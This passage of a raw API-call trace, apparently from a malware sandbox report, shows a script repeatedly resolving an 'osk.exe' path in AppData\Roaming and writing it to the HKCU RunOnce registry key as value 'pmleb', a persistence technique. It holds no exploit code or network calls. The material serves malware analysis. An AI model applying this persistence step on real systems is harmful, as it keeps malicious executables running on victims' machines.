ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.238] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0080.238] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.238] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0080.238] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.239] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0080.239] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.239] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.239] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.239] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.239] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.239] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.239] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.240] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.240] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0080.240] RegCloseKey (hKey=0x280) returned 0x0 [0080.240] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.240] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.240] SetTimer (hWnd=0x20280, nIDEvent=0x206d, uElapse=0xa, lpTimerFunc=0x0) returned 0x206d [0080.240] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.254] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.254] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.254] KillTimer (hWnd=0x20280, uIDEvent=0x206d) returned 1 [0080.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.254] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.255] IUnknown:Release (This=0x787518) returned 0x1 [0080.255] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.255] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.255] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.255] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.255] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e 
[0080.256] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.256] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0080.256] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.256] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0080.257] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.257] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.257] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.257] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.257] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.257] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.257] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.257] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.257] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.257] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.258] RegCloseKey (hKey=0x280) returned 0x0 [0080.258] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.258] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.258] SetTimer (hWnd=0x20280, nIDEvent=0x206e, uElapse=0xa, lpTimerFunc=0x0) returned 0x206e [0080.258] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.268] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.268] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.268] KillTimer (hWnd=0x20280, uIDEvent=0x206e) returned 1 [0080.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.268] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.268] IUnknown:Release (This=0x787518) returned 0x1 [0080.269] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.269] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.269] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.269] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.269] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0080.269] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.269] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0080.269] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.270] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0080.270] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.270] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.271] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.271] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.271] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.271] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.271] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.271] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.271] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.271] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.271] RegCloseKey (hKey=0x280) returned 0x0 [0080.272] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.272] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.272] SetTimer (hWnd=0x20280, nIDEvent=0x206f, uElapse=0xa, lpTimerFunc=0x0) returned 0x206f [0080.272] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.283] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.283] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.283] KillTimer (hWnd=0x20280, uIDEvent=0x206f) returned 1 [0080.283] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.284] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.284] IUnknown:Release (This=0x787518) returned 0x1 [0080.284] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.284] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.284] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.284] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, 